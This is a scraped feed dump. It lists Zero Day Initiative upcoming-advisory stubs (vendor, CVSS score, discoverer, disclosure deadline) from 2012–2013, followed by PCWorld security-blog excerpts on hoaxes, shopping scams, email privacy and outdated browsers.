http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Mil3s beep' was reported to the affected vendor on: 2013-01-23, 30 days ago. The vendor is given until 2013-07-22 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1736: Hewlett-Packard

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Andrea Micalizzi aka rgod' was reported to the affected vendor on: 2013-01-22, 31 days ago. The vendor is given until 2013-07-21 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1698: Oracle

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'axtaxt' was reported to the affected vendor on: 2013-01-22, 31 days ago. The vendor is given until 2013-07-21 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1690: Hewlett-Packard

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Andrea Micalizzi aka rgod' was reported to the affected vendor on: 2013-01-22, 31 days ago. The vendor is given until 2013-07-21 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1671: Hewlett-Packard

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Andrea Micalizzi aka rgod' was reported to the affected vendor on: 2013-01-22, 31 days ago. The vendor is given until 2013-07-21 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1670: Hewlett-Packard

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Andrea Micalizzi aka rgod' was reported to the affected vendor on: 2013-01-22, 31 days ago. The vendor is given until 2013-07-21 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1669: Hewlett-Packard

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Andrea Micalizzi aka rgod' was reported to the affected vendor on: 2013-01-22, 31 days ago. The vendor is given until 2013-07-21 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1724: Apple

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'G. Geshev' was reported to the affected vendor on: 2013-01-08, 45 days ago. The vendor is given until 2013-07-07 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1699: Oracle

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Alin Rad Pop' was reported to the affected vendor on: 2013-01-08, 45 days ago. The vendor is given until 2013-07-07 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1676: Hewlett-Packard

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 10 (AV:N/AC:L/Au:N/C:C/I:C/A:C) severity vulnerability discovered by 'agix' was reported to the affected vendor on: 2013-01-08, 45 days ago. The vendor is given until 2013-07-07 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1732: Oracle

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Ben Murphy' was reported to the affected vendor on: 2013-01-07, 46 days ago. The vendor is given until 2013-07-06 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1727: Oracle

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Vitaliy Toropov' was reported to the affected vendor on: 2013-01-07, 46 days ago. The vendor is given until 2013-07-06 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1726: Adobe

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Aniway.Anyway@gmail.com' was reported to the affected vendor on: 2013-01-07, 46 days ago. The vendor is given until 2013-07-06 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1715: Novell

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'nullPtr Crew' was reported to the affected vendor on: 2013-01-07, 46 days ago. The vendor is given until 2013-07-06 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1704: Apple

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Vitaliy Toropov' was reported to the affected vendor on: 2013-01-07, 46 days ago. The vendor is given until 2013-07-06 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1689: Oracle

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 10 (AV:N/AC:L/Au:N/C:C/I:C/A:C) severity vulnerability discovered by 'Andrea Micalizzi aka rgod' was reported to the affected vendor on: 2013-01-07, 46 days ago. The vendor is given until 2013-07-06 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1678: Hewlett-Packard

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 10 (AV:N/AC:L/Au:N/C:C/I:C/A:C) severity vulnerability discovered by 'Andrea Micalizzi aka rgod' was reported to the affected vendor on: 2013-01-07, 46 days ago. The vendor is given until 2013-07-06 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1579: EMC

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Luigi Auriemma' was reported to the affected vendor on: 2013-01-07, 46 days ago. The vendor is given until 2013-07-06 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1667: Adobe

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Tobias Klein' was reported to the affected vendor on: 2012-11-21, 93 days ago. The vendor is given until 2013-05-20 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1601: Adobe

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Soroush Dalili' was reported to the affected vendor on: 2012-11-21, 93 days ago. The vendor is given until 2013-05-20 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1595: Novell

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 8.5 (AV:N/AC:L/Au:N/C:C/I:P/A:N) severity vulnerability discovered by 'Mak Kolybabi' was reported to the affected vendor on: 2012-11-21, 93 days ago. The vendor is given until 2013-05-20 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1591: Mozilla

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'regenrecht' was reported to the affected vendor on: 2012-11-21, 93 days ago. The vendor is given until 2013-05-20 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1589: Mozilla

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'regenrecht' was reported to the affected vendor on: 2012-11-21, 93 days ago. The vendor is given until 2013-05-20 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1578: MySQL

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 5.1 (AV:N/AC:H/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Luigi Auriemma' was reported to the affected vendor on: 2012-11-21, 93 days ago. The vendor is given until 2013-05-20 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1571: Mozilla

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'regenrecht' was reported to the affected vendor on: 2012-11-21, 93 days ago. The vendor is given until 2013-05-20 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1559: Oracle

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Nicolas Gregoire' was reported to the affected vendor on: 2012-11-21, 93 days ago. The vendor is given until 2013-05-20 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1551: Oracle

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 6.4 (AV:N/AC:L/Au:N/C:P/I:P/A:N) severity vulnerability discovered by 'Francis Provencher From Protek Research Lab's' was reported to the affected vendor on: 2012-11-21, 93 days ago. The vendor is given until 2013-05-20 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the

==> ZDI-CAN-1546: IBM

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Alexander Gavrun' was reported to the affected vendor on: 2012-11-21, 93 days ago. The vendor is given until 2013-05-20 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1545: IBM

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Alexander Gavrun' was reported to the affected vendor on: 2012-11-21, 93 days ago. The vendor is given until 2013-05-20 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1544: IBM

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Alexander Gavrun' was reported to the affected vendor on: 2012-11-21, 93 days ago. The vendor is given until 2013-05-20 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1517: WebKit.Org

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'pa_kt / twitter.com/pa_kt' was reported to the affected vendor on: 2012-11-21, 93 days ago. The vendor is given until 2013-05-20 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1516: WebKit.Org

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'pa_kt / twitter.com/pa_kt' was reported to the affected vendor on: 2012-11-21, 93 days ago. The vendor is given until 2013-05-20 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1687: EMC

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Andrea Micalizzi aka rgod' was reported to the affected vendor on: 2012-11-19, 95 days ago. The vendor is given until 2013-05-18 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1668: Hewlett-Packard

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 10 (AV:N/AC:L/Au:N/C:C/I:C/A:C) severity vulnerability discovered by 'Andrea Micalizzi aka rgod' was reported to the affected vendor on: 2012-11-19, 95 days ago. The vendor is given until 2013-05-18 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1664: Hewlett-Packard

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Andrea Micalizzi aka rgod' was reported to the affected vendor on: 2012-11-19, 95 days ago. The vendor is given until 2013-05-18 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1663: Hewlett-Packard

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'rgod' was reported to the affected vendor on: 2012-11-19, 95 days ago. The vendor is given until 2013-05-18 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1662: Hewlett-Packard

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 9.7 (AV:U/AC:U/Au:N/C:C/I:N/A:N) severity vulnerability discovered by 'rgod' was reported to the affected vendor on: 2012-11-19, 95 days ago. The vendor is given until 2013-05-18 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1661: Hewlett-Packard

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 9 (AV:N/AC:L/Au:N/C:C/I:P/A:P) severity vulnerability discovered by 'Andrea Micalizzi aka rgod' was reported to the affected vendor on: 2012-11-19, 95 days ago. The vendor is given until 2013-05-18 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1660: Hewlett-Packard

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Andrea Micalizzi aka rgod' was reported to the affected vendor on: 2012-11-19, 95 days ago. The vendor is given until 2013-05-18 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1659: Hewlett-Packard

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 10 (AV:N/AC:L/Au:N/C:C/I:C/A:C) severity vulnerability discovered by 'Andrea Micalizzi aka rgod' was reported to the affected vendor on: 2012-11-19, 95 days ago. The vendor is given until 2013-05-18 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1650: Hewlett-Packard

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Andrea Micalizzi aka rgod' was reported to the affected vendor on: 2012-11-19, 95 days ago. The vendor is given until 2013-05-18 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1647: Hewlett-Packard

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Andrea Micalizzi aka rgod' was reported to the affected vendor on: 2012-11-19, 95 days ago. The vendor is given until 2013-05-18 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1646: Hewlett-Packard

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Andrea Micalizzi aka rgod' was reported to the affected vendor on: 2012-11-19, 95 days ago. The vendor is given until 2013-05-18 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1644: Hewlett-Packard

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Andrea Micalizzi aka rgod' was reported to the affected vendor on: 2012-11-19, 95 days ago. The vendor is given until 2013-05-18 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1643: Hewlett-Packard

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Andrea Micalizzi aka rgod' was reported to the affected vendor on: 2012-11-19, 95 days ago. The vendor is given until 2013-05-18 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1641: Apple

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'G. Geshev' was reported to the affected vendor on: 2012-11-19, 95 days ago. The vendor is given until 2013-05-18 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1628: Apple

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Aniway.Anyway@gmail.com' was reported to the affected vendor on: 2012-11-19, 95 days ago. The vendor is given until 2013-05-18 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1620: Apple

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 5.1 (AV:N/AC:H/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Tobias Klein' was reported to the affected vendor on: 2012-11-19, 95 days ago. The vendor is given until 2013-05-18 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1615: Hewlett-Packard

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Andrea Micalizzi aka rgod' was reported to the affected vendor on: 2012-11-19, 95 days ago. The vendor is given until 2013-05-18 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1614: Hewlett-Packard

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Andrea Micalizzi aka rgod' was reported to the affected vendor on: 2012-11-19, 95 days ago. The vendor is given until 2013-05-18 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1613: Hewlett-Packard

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Andrea Micalizzi aka rgod' was reported to the affected vendor on: 2012-11-19, 95 days ago. The vendor is given until 2013-05-18 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1612: Hewlett-Packard

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Andrea Micalizzi aka rgod' was reported to the affected vendor on: 2012-11-19, 95 days ago. The vendor is given until 2013-05-18 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1611: Hewlett-Packard

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 10 (AV:N/AC:L/Au:N/C:C/I:C/A:C) severity vulnerability discovered by 'Andrea Micalizzi aka rgod' was reported to the affected vendor on: 2012-11-19, 95 days ago. The vendor is given until 2013-05-18 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1607: Hewlett-Packard

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Andrea Micalizzi aka rgod' was reported to the affected vendor on: 2012-11-19, 95 days ago. The vendor is given until 2013-05-18 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1606: Hewlett-Packard

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 10 (AV:N/AC:L/Au:N/C:C/I:C/A:C) severity vulnerability discovered by 'Andrea Micalizzi aka rgod' was reported to the affected vendor on: 2012-11-19, 95 days ago. The vendor is given until 2013-05-18 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1603: Apple

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 5.1 (AV:N/AC:H/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Tom Gallagher & Paul Bates' was reported to the affected vendor on: 2012-11-19, 95 days ago. The vendor is given until 2013-05-18 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1566: Hewlett-Packard

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'e6af8de8b1d4b2b6d5ba2610cbf9cd38' was reported to the affected vendor on: 2012-11-19, 95 days ago. The vendor is given until 2013-05-18 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1518: Apple

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Tobias Klein' was reported to the affected vendor on: 2012-11-14, 100 days ago. The vendor is given until 2013-05-13 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1577: Adobe

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Anonymous' was reported to the affected vendor on: 2012-10-24, 121 days ago. The vendor is given until 2013-04-22 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1433: Novell

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Andrea Micalizzi aka rgod' was reported to the affected vendor on: 2012-08-21, 185 days ago. The vendor is given until 2013-02-17 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1339: Novell

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Luigi Auriemma' was reported to the affected vendor on: 2012-08-21, 185 days ago. The vendor is given until 2013-02-17 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1568: Cisco

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Tenable Network Security' was reported to the affected vendor on: 2012-07-24, 213 days ago. The vendor is given until 2013-01-20 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1536: Cisco

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 10 (AV:N/AC:L/Au:N/C:C/I:C/A:C) severity vulnerability discovered by 'Nenad Stojanovski' was reported to the affected vendor on: 2012-07-24, 213 days ago. The vendor is given until 2013-01-20 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1535: Cisco

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 10 (AV:N/AC:L/Au:N/C:C/I:C/A:C) severity vulnerability discovered by 'Nenad Stojanovski' was reported to the affected vendor on: 2012-07-24, 213 days ago. The vendor is given until 2013-01-20 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1527: Novell

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 10 (AV:N/AC:L/Au:N/C:C/I:C/A:C) severity vulnerability discovered by 'James Burton' and 'Insomnia Security' was reported to the affected vendor on: 2012-03-14, 345 days ago. The vendor is given until 2012-09-10 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1510: Hewlett-Packard

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 10 (AV:N/AC:L/Au:N/C:C/I:C/A:C) severity vulnerability discovered by 'e6af8de8b1d4b2b6d5ba2610cbf9cd38' was reported to the affected vendor on: 2012-03-14, 345 days ago. The vendor is given until 2012-09-10 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1509: Hewlett-Packard

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 10 (AV:N/AC:L/Au:N/C:C/I:C/A:C) severity vulnerability discovered by 'e6af8de8b1d4b2b6d5ba2610cbf9cd38' was reported to the affected vendor on: 2012-03-14, 345 days ago. The vendor is given until 2012-09-10 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> Don’t fall for the Facebook privacy notice hoax

http://feeds.pcworld.com/pcworld/blogs/security_alert/ Have you posted the notice to your Facebook timeline to proclaim your copyright ownership of all content? Have you seen others from your social network posting such a notice? If you haven't already, don't bother. It's a hoax. It's not even a new hoax. It's a resurgence of an old hoax that many users fell for earlier this year when Facebook became a publicly traded company. The previous hoax implied that the change from a private company to a public one somehow changed the rules of the privacy agreement and put your posts and photos at risk unless you posted a copy and paste of a disclaimer establishing your copyright ownership. You can't change the Facebook legal terms by posting on your timeline. The new one reads: In response to the new Facebook guidelines I hereby declare that my copyright is attached to all of my personal details, illustrations, paintings, writing, publications, photos and videos, etc. (as a result of the Berne Convention).

==> With shopping scams on the rise, watch for these threats

http://feeds.pcworld.com/pcworld/blogs/security_alert/ Tomorrow is Thanksgiving, which means only one thing: the glorious chaos we call the Holiday Shopping Season will soon be upon us. Holiday shopping also means a spike in online scams, fraud, and malware, so you need to be aware of the risks and threats, and exercise some common sense to avoid a cyber-Grinch incident. Intrepid shoppers will line up for Black Friday deals that have spilled over to Thanksgiving Thursday. You can now start your Black Friday shopping between the turkey feast and the pumpkin pie, before the football games are even over on Thanksgiving Day. The definition of Friday aside, holiday shopping will officially be underway. Black Friday will be followed by Cyber Monday, and many shoppers will turn to their mobile devices to find great deals, so it's prime time for cybercriminals. Be careful what apps you install and what you click on from your mobile device. Rising threat of mobile scams and malware: Black Friday is generally an in-person, brick-and-mortar-store shopping experience, but competition from online retailers and Cyber Monday, combined with the explosion of connected shoppers armed with mobile devices, has changed the game. A report from iovation, a mobile device security and reputation management company, claims that online retail transactions from mobile devices have increased 300 percent over last year. Mobile transactions accounted for nearly one in ten purchases in the most recent quarter, and that number is expected to spike up for holiday shopping.

==> US teens lead the way for shady, risky online behavior

http://feeds.pcworld.com/pcworld/blogs/security_alert/ What does your teen do when he or she is online? Do you know? Teens in general partake in riskier online behavior than your average user, but according to a recent study from McAfee, Exploring the Digital Divide, teens in the United States are even more likely to engage in shady online activities. The new report is a follow-up to McAfee's The Digital Divide: How the Online Behavior of Teens Is Getting Past Parents, released earlier this year. The original survey focused solely on the United States, but the new one expands the scope to include teens in European countries for comparison. The results might be a bit discouraging for parents of US teens. Teens in the United States lead in almost every category of shady online behavior. Nearly a third of US teens have used the Web to intentionally surf for bleep. US teens also lead in using mobile devices to cheat on tests, and are tied for second in using the Internet as a platform for cyber bullying, only half a percentage point behind the Netherlands. Go USA?

==> Here's how to secure your email and avoid becoming a ‘Petraeus’

http://feeds.pcworld.com/pcworld/blogs/security_alert/ It was a shock when David Petraeus, a respected and highly decorated Army general, abruptly stepped down from his post as the director of the CIA earlier this week. It was even more of a jolt to learn that his resignation was due to an extramarital affair. But the real story might be the fact that the affair came to light more or less accidentally as a result of poor email and privacy practices. First, a little background on how things went down. The affair between David Petraeus and his biographer Paula Broadwell seems like something from the Showtime series Homeland, or perhaps a James Bond plot line, but the events that led to the FBI investigation that uncovered the affair are a bit more Fatal Attraction. Broadwell sent anonymous threatening emails to another woman she considered to be competition for Petraeus' affection, and that woman, Jill Kelley, initiated the investigation that eventually unraveled the affair and led to the downfall of one of this generation's greatest American heroes. I don't want to teach anyone how to cover their illicit tracks better, or how to have a more clandestine affair, but let's take a look at where Petraeus and Broadwell went wrong so you can understand how to cover your tracks better in general, and how to secure your email and protect your privacy online.

==> Out of date, vulnerable browsers put users at risk

http://feeds.pcworld.com/pcworld/blogs/security_alert/ Is your browser up to date? According to the results of a new survey from Kaspersky, a security software vendor, nearly a quarter of the browsers currently in use are out of date. Surfing the Web with a vulnerable browser is a recipe for disaster. The Web browser has evolved to become the primary software used on many PCs. People access their email, surf websites, create documents and spreadsheets, access cloud-based file storage and sharing sites, and share with others on social networking sites, all through the browser. Attackers know this as well, which is why it is exceptionally risky to use a browser with known vulnerabilities. Kaspersky gathered anonymous data through its cloud-based Kaspersky Security Network. Kaspersky researchers analyzed the browser usage data from millions of customers around the world, and uncovered some concerning trends. * 23 percent of browsers are not current: 14.5 percent are still using the previous version, while 8.5 percent are using even older, obsolete versions. * When a new version of a browser is released, it can take nearly 10 days for it to surpass the previous version in usage, and an average of about a month for a majority of users to upgrade. Keep your browser up to date to avoid Web-based attacks. The major browsers all have automatic update mechanisms in place. The easiest way to make sure your browser is current is to enable the automatic updates and let them do what they're meant to do: keep your browser up to date without requiring you to manage the process yourself.

==> Study finds 25 percent of Android apps to be a security risk

